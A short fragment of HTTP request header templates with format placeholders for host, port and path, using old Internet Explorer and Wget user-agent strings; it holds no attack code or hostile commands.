User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: %s:%d
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: */*
Accept-Language: en
User-Agent: Wget/1.12 (linux-gnu)
Host: %s:%d
Connection: Keep-Alive